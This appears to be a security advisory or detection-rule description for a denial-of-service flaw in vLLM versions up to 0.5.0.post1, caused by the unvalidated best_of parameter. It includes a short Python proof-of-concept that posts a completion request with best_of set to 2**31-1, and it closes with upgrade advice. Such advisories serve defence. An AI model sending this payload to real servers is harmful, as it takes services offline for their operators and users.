vLLM is an open-source, high-throughput, memory-efficient inference and serving engine for LLMs. vLLM 0.5.0.post1 and earlier versions contain a resource management error vulnerability: the best_of parameter in the vLLM JSON web API is not properly validated, allowing a remote attacker to trigger a denial of service. This rule helps defend against A06:2021 - Vulnerable and Outdated Components of the OWASP Top 10 (2021). Other references: None
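As a rough illustration of the attack shape, the sketch below sends a completion request with an oversized best_of value to a vLLM OpenAI-compatible server. This is a minimal sketch, not taken from the advisory: the server address, model name, and parameter values are assumptions, chosen only to show how an unbounded best_of can drive excessive resource consumption on unpatched versions.

```python
# Illustrative sketch only (assumptions: a vLLM <= 0.5.0.post1 server
# exposing the OpenAI-compatible completions endpoint on localhost:8000;
# the model name and parameter values are hypothetical).
import requests

payload = {
    "model": "facebook/opt-125m",   # example model name (assumption)
    "prompt": "Hello",
    "max_tokens": 16,
    "n": 1,
    # An absurdly large best_of: unpatched versions do not bound this
    # input, so the server attempts to schedule that many candidate
    # sequences, exhausting memory/compute and causing denial of service.
    "best_of": 2**31 - 1,
}

resp = requests.post(
    "http://localhost:8000/v1/completions",
    json=payload,
    timeout=10,
)
print(resp.status_code, resp.text[:200])
```

Patched versions reject such requests with a validation error instead of accepting the parameter; upgrading vLLM beyond 0.5.0.post1 is the primary remediation, with this rule serving as a compensating control.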